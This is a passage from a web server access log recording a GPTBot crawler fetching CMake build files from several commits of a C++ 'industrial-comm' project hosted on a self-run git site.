74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10237] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11282] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10358] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11370] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11308] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10359] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10295] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11653] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11651] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11652] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16056] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11654] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16058] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11654] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 